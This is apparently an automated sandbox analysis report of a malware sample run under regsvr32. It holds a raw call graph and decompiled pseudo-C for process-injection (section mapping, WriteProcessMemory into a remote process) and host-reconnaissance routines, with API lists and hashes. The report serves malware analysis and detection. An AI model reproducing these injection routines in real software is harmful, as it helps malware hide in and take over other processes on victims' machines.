11312 316efac 11311->11312 11313 316ef51 11311->11313 11312->11297 11313->11312 11314 316f004 LoadLibraryA 11313->11314 11314->11312 11315 316f012 GetProcAddress 11314->11315 11315->11312 11316 316f01e 11315->11316 11316->11312 11319 3168cc4 lstrlenW 11317->11319 11322 3168dc9 RtlAllocateHeap 11319->11322 11321 3168d4b 11321->11253 11321->11321 11322->11321 11323->11265 11325 3168bcd 2 API calls 11324->11325 11326 3161096 11325->11326 11326->11269 11331 3168f63 11327->11331 11330 3169fd3 11330->11277 11332 3168f6c memset 11331->11332 11333 3168f7d _vsnprintf 11331->11333 11332->11333 11333->11330 11346 316651e 11334->11346 11338 31663b3 11340 31663ed 11338->11340 11345 31663bd 11338->11345 11409 316d889 11338->11409 11341 3166424 11340->11341 11342 316641d 11340->11342 11341->11345 11449 3163597 11341->11449 11425 31661e8 11342->11425 11347 316f0d9 8 API calls 11346->11347 11348 3166532 11347->11348 11349 316f0d9 8 API calls 11348->11349 11350 316654b 11349->11350 11351 316f0d9 8 API calls 11350->11351 11352 3166564 11351->11352 11353 316f0d9 8 API calls 11352->11353 11354 316657d 11353->11354 11355 316f0d9 8 API calls 11354->11355 11356 3166598 11355->11356 11357 316f0d9 8 API calls 11356->11357 11358 31665b1 11357->11358 11359 316f0d9 8 API calls 11358->11359 11360 31665ca 11359->11360 11361 316f0d9 8 API calls 11360->11361 11362 31665e3 11361->11362 11363 316f0d9 8 API calls 11362->11363 11364 31663a7 GetOEMCP 11363->11364 11365 316dfc2 11364->11365 11456 3168dc9 RtlAllocateHeap 11365->11456 11367 316dfdd 11368 316dfe8 GetCurrentProcessId 11367->11368 11408 316e33d 11367->11408 11369 316e000 11368->11369 11457 316ca0a 11369->11457 11371 316e064 11473 316f3a0 11371->11473 11372 316e053 11372->11371 11464 316ca5a 11372->11464 11377 316e099 11378 316e0e3 GetLastError 11377->11378 11379 316e0e9 GetSystemMetrics 11377->11379 11378->11379 11380 316e110 11379->11380 11482 316c85a 11380->11482 11386 316e14b 11499 316c870 11386->11499 11391 3168f63 memset 11392 316e1a2 
GetVersionExA 11391->11392 11518 316ddbe 11392->11518 11396 316e1c0 GetWindowsDirectoryW 11397 3169f85 2 API calls 11396->11397 11398 316e1e3 11397->11398 11399 3168d9a 2 API calls 11398->11399 11400 316e21d 11399->11400 11402 316e255 11400->11402 11541 3169fe4 11400->11541 11524 317357b 11402->11524 11408->11338 11619 316d7cd 11409->11619 11412 316d9d5 11412->11340 11414 316d9ca 11416 3168ddf 2 API calls 11414->11416 11415 316d9b8 11415->11414 11417 3168ddf 2 API calls 11415->11417 11416->11412 11417->11415 11418 3168f63 memset 11423 316d8c6 11418->11423 11421 316d939 GetLastError 11649 316dadc ResumeThread 11421->11649 11423->11414 11423->11415 11423->11418 11423->11421 11424 316d963 FindCloseChangeNotification 11423->11424 11631 316be10 11423->11631 11636 316d9de 11423->11636 11424->11423 11719 316a79b 11425->11719 11428 31661f7 11428->11345 11429 316620f 11735 316601d 11429->11735 11435 3166272 11770 31660d9 11435->11770 11436 3166223 11438 3166277 11436->11438 11439 3166228 11436->11439 11440 3166270 11438->11440 11441 3166293 11438->11441 11783 3170ac8 11438->11783 11439->11441 11444 316b6e3 7 API calls 11439->11444 11804 31660bf 11440->11804 11441->11345 11445 3166248 11444->11445 11747 3165c8c 11445->11747 12967 3168dc9 RtlAllocateHeap 11449->12967 11451 316359e 11455 31635d5 11451->11455 12968 3168dc9 RtlAllocateHeap 11451->12968 11453 31635af 11454 31698d0 2 API calls 11453->11454 11453->11455 11454->11455 11455->11345 11456->11367 11458 316ca21 11457->11458 11459 316ca25 11458->11459 11545 316c9f3 11458->11545 11459->11372 11462 316ca36 11462->11372 11463 316ca4a FindCloseChangeNotification 11463->11462 11558 316c92f GetCurrentThread OpenThreadToken 11464->11558 11467 316c986 6 API calls 11472 316ca8e FindCloseChangeNotification 11467->11472 11469 316cb06 11471 3168ddf 2 API calls 11469->11471 11470 316cb10 11470->11371 11471->11470 11472->11469 11472->11470 11475 316f3bf 11473->11475 11474 316e08e 11477 316f365 11474->11477 11475->11474 11563 3169ab3 
11475->11563 11478 316f37c 11477->11478 11479 316f39c 11478->11479 11480 3169ab3 RtlAllocateHeap 11478->11480 11479->11377 11481 316f389 11480->11481 11481->11377 11568 316c778 11482->11568 11484 316c86e 11485 316c64d 11484->11485 11486 316c668 11485->11486 11487 3169f6b 2 API calls 11486->11487 11488 316c672 11487->11488 11583 31736d5 11488->11583 11490 316c6bd 11491 3168d87 2 API calls 11490->11491 11492 316c6c9 11491->11492 11495 3169bd5 11492->11495 11493 316c687 11493->11490 11494 31736d5 2 API calls 11493->11494 11494->11493 11496 3169be1 MultiByteToWideChar 11495->11496 11497 3169bdc 11495->11497 11498 3169bf5 11496->11498 11497->11386 11498->11386 11500 3169f6b 2 API calls 11499->11500 11501 316c88b 11500->11501 11502 3169f6b 2 API calls 11501->11502 11504 316c89a 11502->11504 11503 316c92a 11512 316cbd7 11503->11512 11504->11503 11505 31736d5 2 API calls 11504->11505 11506 316c8eb 11504->11506 11505->11504 11507 31736d5 2 API calls 11506->11507 11508 316c916 11506->11508 11507->11506 11509 3168d87 2 API calls 11508->11509 11510 316c922 11509->11510 11511 3168d87 2 API calls 11510->11511 11511->11503 11513 316cbef 11512->11513 11514 316cbf3 11513->11514 11515 316c986 6 API calls 11513->11515 11514->11391 11517 316cc07 11515->11517 11516 3168ddf 2 API calls 11516->11514 11517->11514 11517->11516 11519 316dde4 11518->11519 11520 316ddd3 GetCurrentProcess IsWow64Process 11518->11520 11521 316dde7 11519->11521 11520->11519 11522 316ddf6 GetSystemInfo 11521->11522 11523 316ddf1 11521->11523 11522->11396 11523->11396 11525 3173586 11524->11525 11527 316e31e 11524->11527 11526 31736d5 2 API calls 11525->11526 11525->11527 11526->11525 11528 31698d0 11527->11528 11588 3169858 11528->11588 11531 316db68 11535 316dd4d 11531->11535 11532 3169f6b 2 API calls 11532->11535 11533 316dd7d 11594 316baf6 CreateToolhelp32Snapshot 11533->11594 11535->11532 11535->11533 11537 3168d87 2 API calls 11535->11537 11602 3169d29 11535->11602 11537->11535 11538 316dd99 11540 316ddb6 
11538->11540 11608 3169e22 11538->11608 11540->11408 11542 3168f63 memset 11541->11542 11543 3169ff8 _vsnwprintf 11542->11543 11544 316a015 11543->11544 11544->11402 11548 316c986 GetTokenInformation 11545->11548 11549 316c9c5 11548->11549 11550 316c9a8 GetLastError 11548->11550 11549->11462 11549->11463 11550->11549 11551 316c9b3 11550->11551 11557 3168dc9 RtlAllocateHeap 11551->11557 11553 316c9bb 11553->11549 11554 316c9c9 GetTokenInformation 11553->11554 11554->11549 11555 316c9de 11554->11555 11556 3168ddf 2 API calls 11555->11556 11556->11549 11557->11553 11559 316c97c 11558->11559 11560 316c950 GetLastError 11558->11560 11559->11467 11559->11470 11560->11559 11561 316c95d OpenProcessToken 11560->11561 11561->11559 11564 3169abc 11563->11564 11566 3169ace 11563->11566 11567 3168dc9 RtlAllocateHeap 11564->11567 11566->11474 11567->11566 11569 3168f63 memset 11568->11569 11570 316c79a lstrcpynW 11569->11570 11572 3169f85 2 API calls 11570->11572 11573 316c7cf GetVolumeInformationW 11572->11573 11574 3168d9a 2 API calls 11573->11574 11575 316c804 11574->11575 11576 3169fe4 2 API calls 11575->11576 11577 316c825 lstrcatW 11576->11577 11581 316a5e9 11577->11581 11580 316c84b 11580->11484 11582 316a5f1 CharUpperBuffW 11581->11582 11582->11580 11584 31736e5 11583->11584 11585 3173718 lstrlenW 11584->11585 11586 3173735 _ftol2_sse 11585->11586 11586->11493 11589 3169868 11588->11589 11589->11589 11590 31736d5 2 API calls 11589->11590 11593 3169883 11590->11593 11591 31698b7 11591->11531 11592 31736d5 2 API calls 11592->11593 11593->11591 11593->11592 11595 316bb20 11594->11595 11596 316bb4b 11594->11596 11597 3168f63 memset 11595->11597 11596->11538 11598 316bb32 Process32First 11597->11598 11598->11596 11600 316bb59 11598->11600 11599 316bb7e FindCloseChangeNotification 11599->11596 11600->11599 11614 316daf2 11600->11614 11604 3169d3d 11602->11604 11617 3168dc9 RtlAllocateHeap 11604->11617 11605 3169e0c 11605->11535 11607 3169d95 11607->11605 11618 3168dc9 
RtlAllocateHeap 11607->11618 11609 3169e6e 11608->11609 11613 3169e33 11608->11613 11609->11538 11610 3169e65 11612 3168ddf 2 API calls 11612->11613 11613->11609 11613->11610 11613->11612 11617->11607 11618->11607 11620 316d7e7 11619->11620 11650 3168dc9 RtlAllocateHeap 11620->11650 11622 316d81b 11623 3169f85 2 API calls 11622->11623 11624 316d878 11622->11624 11625 3168d9a 2 API calls 11622->11625 11626 3169ab3 RtlAllocateHeap 11622->11626 11623->11622 11624->11412 11627 316b6e3 11624->11627 11625->11622 11626->11622 11628 316b6fc 11627->11628 11651 316b632 11628->11651 11632 3168f63 memset 11631->11632 11633 316be26 11632->11633 11634 3168f63 memset 11633->11634 11635 316be33 CreateProcessW 11634->11635 11635->11423 11660 316d309 11636->11660 11643 3168f63 memset 11644 316da24 GetThreadContext 11643->11644 11645 316da4e NtProtectVirtualMemory 11644->11645 11647 316dace 11644->11647 11646 316da90 NtWriteVirtualMemory 11645->11646 11645->11647 11646->11647 11648 316daad NtProtectVirtualMemory 11646->11648 11707 316d47c 11647->11707 11648->11647 11649->11423 11650->11622 11652 317357b 2 API calls 11651->11652 11653 316b64a 11652->11653 11654 3169f6b 2 API calls 11653->11654 11655 316b674 11654->11655 11656 3169fa5 2 API calls 11655->11656 11657 316b6d2 11656->11657 11658 3168d87 2 API calls 11657->11658 11659 316b6dd 11658->11659 11659->11423 11661 316d337 11660->11661 11662 316d325 11660->11662 11664 3169f85 2 API calls 11661->11664 11662->11661 11663 316d464 11662->11663 11663->11647 11686 316d538 11663->11686 11665 316d344 11664->11665 11666 3169fe4 2 API calls 11665->11666 11667 316d37d 11666->11667 11668 3169f85 2 API calls 11667->11668 11669 316d39c 11668->11669 11712 3169c50 11669->11712 11672 3168d9a 2 API calls 11673 316d3c4 11672->11673 11674 3169c50 2 API calls 11673->11674 11675 316d3e7 LoadLibraryW 11674->11675 11677 316d412 11675->11677 11680 316d420 11675->11680 11678 316f08e 3 API calls 11677->11678 11678->11680 11679 3168ddf 2 API calls 11681 
316d435 11679->11681 11680->11679 11682 3168f63 memset 11681->11682 11683 316d447 11682->11683 11683->11663 11684 3168ddf 2 API calls 11683->11684 11685 316d462 11684->11685 11685->11663 11687 316d56b 11686->11687 11688 316d58c NtCreateSection 11687->11688 11693 316d77f 11687->11693 11689 316d5b5 RegisterClassExA 11688->11689 11688->11693 11690 316d645 NtMapViewOfSection 11689->11690 11691 316d609 CreateWindowExA 11689->11691 11690->11693 11698 316d678 NtMapViewOfSection 11690->11698 11691->11690 11694 316d633 DestroyWindow UnregisterClassA 11691->11694 11692 316d7b4 11696 316d7bd NtClose 11692->11696 11697 316d7c8 11692->11697 11693->11692 11699 316d7b0 NtUnmapViewOfSection 11693->11699 11694->11690 11696->11697 11697->11643 11697->11647 11698->11693 11700 316d69c 11698->11700 11699->11692 11701 3168e2e RtlAllocateHeap 11700->11701 11702 316d6ac 11701->11702 11702->11693 11703 316d6bb VirtualAllocEx WriteProcessMemory 11702->11703 11704 3168ddf 2 API calls 11703->11704 11705 316d702 11704->11705 11706 316d765 lstrlenW 11705->11706 11706->11693 11708 316d485 FreeLibrary 11707->11708 11709 316d493 11707->11709 11708->11709 11710 3168ddf 2 API calls 11709->11710 11711 316d4b4 11709->11711 11710->11711 11711->11423 11713 3169c62 11712->11713 11718 3168dc9 RtlAllocateHeap 11713->11718 11715 3169c81 11716 3169c9e 11715->11716 11717 3169c8d lstrcatW 11715->11717 11716->11672 11717->11715 11718->11715 11808 316a7c6 11719->11808 11722 3170cd9 11872 3168dc9 RtlAllocateHeap 11722->11872 11724 3170ce0 11725 3170cea 11724->11725 11873 316b553 11724->11873 11725->11429 11728 3170d2e 11728->11429 11733 3170ac8 14 API calls 11734 3170d2b 11733->11734 11734->11429 11910 316ab83 11735->11910 11738 3166319 11739 316b6e3 7 API calls 11738->11739 11740 3166336 11739->11740 11741 3165c8c 10 API calls 11740->11741 11743 3166219 11740->11743 11742 3166370 11741->11742 11742->11743 11941 316ab69 11742->11941 11743->11435 11743->11436 11746 3166382 lstrcmpiW 11746->11743 11748 316b6e3 7 
API calls 11747->11748 11749 3165ca5 11748->11749 11750 3169bfd 2 API calls 11749->11750 11751 3165cb2 11749->11751 11752 3165cd5 11750->11752 11945 316b270 11752->11945 11754 3165ce5 11755 3165d09 11754->11755 11758 316b270 2 API calls 11754->11758 11756 3168ddf 2 API calls 11755->11756 11757 3165d15 11756->11757 11759 316618c 11757->11759 11758->11755 11760 316ab69 4 API calls 11759->11760 11761 3166196 11760->11761 11762 31661a4 lstrcmpiW 11761->11762 11763 316619f 11761->11763 11764 31661d6 11762->11764 11765 31661ba 11762->11765 11763->11440 11767 3168ddf 2 API calls 11764->11767 11950 316ac61 11765->11950 11767->11763 11999 3168dc9 RtlAllocateHeap 11770->11999 11772 31660eb 11773 31660fe GetDriveTypeW 11772->11773 11774 316612f 11772->11774 11773->11774 12000 3162bee 11774->12000 11776 316614b 11777 3166169 11776->11777 12019 3165315 11776->12019 12072 316b162 11777->12072 11781 316b162 2 API calls 11782 3166185 11781->11782 11782->11438 11784 316109a 2 API calls 11783->11784 11785 3170ad7 11784->11785 12611 31667db memset 11785->12611 11788 3168d9a 2 API calls 11789 3170afd 11788->11789 11790 3170b76 11789->11790 12623 316aaff 11789->12623 11790->11440 11794 3170b28 11794->11790 11795 316109a 2 API calls 11794->11795 11796 3170b3a 11795->11796 11797 3169fe4 2 API calls 11796->11797 11798 3170b49 11797->11798 11799 316b787 2 API calls 11798->11799 11800 3170b5c 11799->11800 11801 3170b6a 11800->11801 12627 316af67 11800->12627 11803 3168ddf 2 API calls 11801->11803 11803->11790 11805 31660d1 11804->11805 12640 31659f4 11805->12640 11847 3168dc9 RtlAllocateHeap 11808->11847 11810 316a7f0 11834 31661f3 11810->11834 11848 316c5c6 11810->11848 11813 3169f6b 2 API calls 11814 316a830 11813->11814 11817 316a96e 11814->11817 11818 316a85c 11814->11818 11815 316a9bf 11816 3169bfd 2 API calls 11815->11816 11842 316a96a 11816->11842 11817->11815 11819 316a980 11817->11819 11818->11842 11858 3169bfd 11818->11858 11821 3169bfd 2 API calls 11819->11821 11819->11842 11820 

            Control-flow Graph

            C-Code - Quality: 95%
            			E0316D538(void* __ecx, intOrPtr __edx) {
            				void* _v8;
            				void* _v12;
            				void* _v16;
            				void* _v20;
            				long _v24;
            				long _v28;
            				short _v32;
            				char _v36;
            				intOrPtr* _v40;
            				intOrPtr _v44;
            				long _v48;
            				void* _v52;
            				void* _v53;
            				char _v64;
            				short _v68;
            				struct _WNDCLASSEXA _v116;
            				char _t81;
            				intOrPtr* _t83;
            				intOrPtr _t87;
            				intOrPtr _t90;
            				char _t97;
            				short _t98;
            				intOrPtr _t105;
            				long _t107;
            				char _t119;
            				void* _t124;
            				struct HWND__* _t132;
            				void* _t138;
            				void* _t147;
            				void* _t154;
            				intOrPtr _t155;
            				intOrPtr _t157;
            				void* _t158;
            				void* _t163;
            				void* _t165;
            
            				_t81 =  *0x317f8d4; // 0x4fafc00
            				_t138 = 0;
            				_v12 = __ecx;
            				_t157 = __edx;
            				_v20 = 0;
            				_v52 = 0;
            				_v48 = 0;
            				_v16 = 0;
            				_v8 = 0;
            				_v24 = 0;
            				_v44 = __edx;
            				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
            					E0316F15B(0x1f4);
            				}
            				_t12 = _t157 + 0x3c; // 0x852c50ff
            				_t83 =  *_t12 + _t157;
            				_v28 = _t138;
            				_v40 = _t83;
            				if( *_t83 != 0x4550) {
            					L14:
            					_t158 = _v12;
            					L15:
            					if(_v8 != _t138) {
            						_t90 =  *0x317f9d0; // 0x4fafa00
            						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
            						_v8 = _t138;
            					}
            					L17:
            					if(_v16 != 0) {
            						_t87 =  *0x317f8d0; // 0x4faf8c0
            						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
            					}
            					if(_v20 != 0) {
            						NtClose(_v20);
            					}
            					return _v8;
            				}
            				_v52 =  *((intOrPtr*)(_t83 + 0x50));
            				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
            					goto L14;
            				}
            				_t97 =  *"18293"; // 0x39323831
            				_v36 = _t97;
            				_t98 =  *0x317ce70; // 0x33
            				_v32 = _t98;
            				_v116.lpszClassName =  &_v64;
            				asm("movsd");
            				_v116.lpfnWndProc = DefWindowProcW;
            				_v116.cbWndExtra = _t138;
            				asm("movsd");
            				_v116.style = 0xb;
            				_v116.lpszMenuName = _t138;
            				_v116.cbSize = 0x30;
            				asm("movsb");
            				_v116.cbClsExtra = _t138;
            				_v116.hInstance = _t138;
            				if(RegisterClassExA( &_v116) != 0) {
            					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
            					if(_t132 != 0) {
            						DestroyWindow(_t132);
            						UnregisterClassA( &_v64, _t138);
            					}
            				}
            				_t105 =  *0x317f8d0; // 0x4faf8c0
            				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
            				_t158 = _v12;
            				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
            					goto L15;
            				} else {
            					_t154 = E03168E2E( *0x317f8d4, 0x1ac4);
            					_v36 = _t154;
            					if(_t154 == 0) {
            						goto L15;
            					}
            					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
            					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
            					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
            					E03168DDF( &_v36, 0x1ac4);
            					_t119 =  *0x317f8d4; // 0x4fafc00
            					_t155 =  *0x317f8e8; // 0x3160000
            					_v36 = _t119;
            					 *0x317f8e8 = _v8;
            					 *0x317f8d4 = _t163;
            					E03168EA6(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
            					E0316D4B7(_v16, _v8, _v44);
            					_t124 = E0316A5D0("Jjischug");
            					_v53 = _t138;
            					_t147 = 0xf;
            					if(_t124 > _t147) {
            						do {
            							L12:
            							_t63 = _t138 + 0x41; // 0x41
            							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
            							_t138 = _t138 + 1;
            						} while (_t138 < _t147);
            						L13:
            						lstrlenW( &_v68);
            						 *0x317f8e8 = _t155;
            						 *0x317f8d4 = _v36;
            						goto L17;
            					}
            					_t147 = _t124;
            					if(_t147 == 0) {
            						goto L13;
            					}
            					goto L12;
            				}
            			}


            APIs
            • NtCreateSection.NTDLL(0316DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0316D5AA
            • RegisterClassExA.USER32(?), ref: 0316D5FE
            • CreateWindowExA.USER32 ref: 0316D629
            • DestroyWindow.USER32(00000000), ref: 0316D634
            • UnregisterClassA.USER32 ref: 0316D63F
            • NtMapViewOfSection.NTDLL(0316DA07,00000000), ref: 0316D66A
            • NtMapViewOfSection.NTDLL(0316DA07,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0316D691
            • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0316D6D7
            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0316D6F1
              • Part of subcall function 03168DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03168E25
            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,03166297), ref: 0316D769
            • NtUnmapViewOfSection.NTDLL(00000000), ref: 0316D7B1
            • NtClose.NTDLL(00000000), ref: 0316D7C5
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
            • String ID: 0$18293$Jjischug$aeroflot
            • API String ID: 494031690-3772587274
            • Opcode ID: 6b9a517292989289bf433dd596e445218765cdcde545ecd6c8b449e6e118c52e
            • Instruction ID: dbb5de0baf0f33fcd6a52f9c302a04383aaef4be3fecac70ea70e70a78afcd0e
            • Opcode Fuzzy Hash: 6b9a517292989289bf433dd596e445218765cdcde545ecd6c8b449e6e118c52e
            • Instruction Fuzzy Hash: 5F81F9B5A00219AFDB14EFD5D884EEEBBF8FF0C704F18406AE505A7294D7709991CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 79%
            			E0316DFC2(void* __fp0) {
            				char _v8;
            				char _v12;
            				char _v16;
            				char _v144;
            				char _v656;
            				char _v668;
            				char _v2644;
            				void* __esi;
            				struct _OSVERSIONINFOA* _t68;
            				intOrPtr _t70;
            				void* _t71;
            				intOrPtr _t73;
            				void* _t74;
            				intOrPtr _t75;
            				intOrPtr* _t77;
            				intOrPtr _t79;
            				intOrPtr _t80;
            				intOrPtr _t81;
            				intOrPtr _t87;
            				int _t90;
            				intOrPtr _t92;
            				void* _t93;
            				void* _t97;
            				intOrPtr _t99;
            				intOrPtr _t101;
            				short _t106;
            				char _t108;
            				intOrPtr _t113;
            				intOrPtr _t116;
            				intOrPtr _t119;
            				intOrPtr _t123;
            				intOrPtr _t134;
            				intOrPtr _t136;
            				intOrPtr _t138;
            				intOrPtr _t141;
            				intOrPtr _t143;
            				intOrPtr _t148;
            				void* _t149;
            				WCHAR* _t150;
            				char* _t151;
            				intOrPtr _t162;
            				intOrPtr _t177;
            				void* _t191;
            				struct _OSVERSIONINFOA* _t192;
            				void* _t193;
            				void* _t195;
            				char _t198;
            				void* _t199;
            				char* _t200;
            				void* _t203;
            				int* _t204;
            				void* _t216;
            
            				_t216 = __fp0;
            				_t148 =  *0x317f8e8; // 0x3160000
            				_t68 = E03168DC9(0x1ac4);
            				_t192 = _t68;
            				if(_t192 != 0) {
            					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
            					_t70 =  *0x317f8d0; // 0x4faf8c0
            					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
            					_t3 = _t192 + 0x648; // 0x648
            					E031735A9( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
            					_t73 =  *0x317f8d0; // 0x4faf8c0
            					_t5 = _t192 + 0x1644; // 0x1644
            					_t194 = _t5;
            					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
            					_t207 = _t74;
            					if(_t74 != 0) {
            						 *((intOrPtr*)(_t192 + 0x1854)) = E031697E9(_t194, _t207);
            					}
            					_t75 =  *0x317f8d0; // 0x4faf8c0
            					_t77 = E0316CA0A( *((intOrPtr*)(_t75 + 0x12c))()); // executed
            					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
            					_t159 =  *_t77;
            					if(E0316CB85( *_t77) == 0) {
            						_t79 = E0316CA5A(_t159, _t194); // executed
            						__eflags = _t79;
            						_t162 = (0 | _t79 > 0x00000000) + 1;
            						__eflags = _t162;
            						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
            					} else {
            						 *((intOrPtr*)(_t192 + 0x214)) = 3;
            					}
            					_t14 = _t192 + 0x220; // 0x220, executed
            					_t80 = E0316F3A0(_t14); // executed
            					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
            					_t81 = E0316F365(_t14); // executed
            					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
            					_t17 = _t192 + 0x114; // 0x114
            					_t195 = _t17;
            					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
            					_push( &_v16);
            					_v12 = 0x80;
            					_push( &_v8);
            					_v8 = 0x100;
            					_push( &_v656);
            					_push( &_v12);
            					_push(_t195);
            					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
            					_t87 =  *0x317f8d8; // 0x4fafab0
            					_push(0); // executed
            					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
            						GetLastError();
            					}
            					_t90 = GetSystemMetrics(0x1000);
            					_t28 = _t192 + 0x228; // 0x228
            					_t149 = _t28;
            					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
            					E0316DFBB(_t149); // executed
            					_t211 = _t149;
            					if(_t149 != 0) {
            						 *((intOrPtr*)(_t192 + 0x434)) = E031697E9(_t149, _t211);
            					}
            					_t92 = E0316C85A();
            					_t33 = _t192 + 0xb0; // 0xb0
            					_t196 = _t33;
            					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
            					_t93 = E0316C64D(_t92, _t33, _t211, _t216);
            					_t35 = _t192 + 0xd0; // 0xd0
            					E03169BD5(_t93, _t33, _t35);
            					_t36 = _t192 + 0x438; // 0x438
            					E03169803(_t149, _t36);
            					_t97 = E0316E34A(_t196, E0316A5D0(_t33), 0);
            					_t37 = _t192 + 0x100c; // 0x100c
            					E0316C870(_t97, _t37, _t216);
            					_t99 =  *0x317f8d0; // 0x4faf8c0
            					_t101 = E0316CBD7( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
            					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
            					E03168F63(_t192, 0, 0x9c);
            					_t204 = _t203 + 0xc;
            					_t192->dwOSVersionInfoSize = 0x9c;
            					GetVersionExA(_t192);
            					 *((intOrPtr*)(_t192 + 0xa8)) = E0316DDBE(_t100);
            					_t106 = E0316DDE7(_t105);
            					_t41 = _t192 + 0x1020; // 0x1020
            					_t150 = _t41;
            					 *((short*)(_t192 + 0x9c)) = _t106;
            					GetWindowsDirectoryW(_t150, 0x104);
            					_t108 = E03169F85(_t105, 0xf73);
            					_t177 =  *0x317f8d0; // 0x4faf8c0
            					_t198 = _t108;
            					 *_t204 = 0x104;
            					_push( &_v668);
            					_push(_t198);
            					_v8 = _t198;
            					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
            						_t143 =  *0x317f8d0; // 0x4faf8c0
            						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
            					}
            					E03168D9A( &_v8);
            					_t113 =  *0x317f8d0; // 0x4faf8c0
            					_t48 = _t192 + 0x1434; // 0x1434
            					_t199 = _t48;
            					 *_t204 = 0x209;
            					_push(_t199);
            					_push(L"USERPROFILE");
            					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
            						E03169FE4(_t199, 0x105, L"%s\\%s", _t150);
            						_t141 =  *0x317f8d0; // 0x4faf8c0
            						_t204 =  &(_t204[5]);
            						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
            					}
            					_push(0x20a);
            					_t51 = _t192 + 0x122a; // 0x122a
            					_t151 = L"TEMP";
            					_t116 =  *0x317f8d0; // 0x4faf8c0
            					_push(_t151);
            					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
            						_t138 =  *0x317f8d0; // 0x4faf8c0
            						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
            					}
            					_push(0x40);
            					_t200 = L"SystemDrive";
            					_push( &_v144);
            					_t119 =  *0x317f8d0; // 0x4faf8c0
            					_push(_t200);
            					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
            						_t136 =  *0x317f8d0; // 0x4faf8c0
            						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
            					}
            					_v8 = 0x7f;
            					_t59 = _t192 + 0x199c; // 0x199c
            					_t123 =  *0x317f8d0; // 0x4faf8c0
            					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
            					_t62 = _t192 + 0x100c; // 0x100c
            					E031735A9(E0316E34A(_t62, E0316A5D0(_t62), 0),  &_v2644);
            					_t63 = _t192 + 0x1858; // 0x1858
            					E0317357B( &_v2644, _t63, 0x20);
            					_push( &_v2644);
            					_push(0x1e);
            					_t66 = _t192 + 0x1878; // 0x1878
            					_t191 = 0x14;
            					E031698D0(_t66, _t191);
            					_t134 = E0316DB68(_t191); // executed
            					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
            					return _t192;
            				}
            				return _t68;
            			}


            APIs
              • Part of subcall function 03168DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03169793,00000100,?,0316661B), ref: 03168DD7
            • GetCurrentProcessId.KERNEL32 ref: 0316DFE9
            • GetLastError.KERNEL32 ref: 0316E0E3
            • GetSystemMetrics.USER32(00001000), ref: 0316E0F3
            • GetVersionExA.KERNEL32(00000000), ref: 0316E1A8
              • Part of subcall function 0316CA5A: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,03160000), ref: 0316CAFE
            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0316E1D3
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
            • API String ID: 3131805607-2706916422
            • Opcode ID: 4a2139b8098c13373e5124f409f867e7c16d3852b704ebd5c3fc207008b6b30b
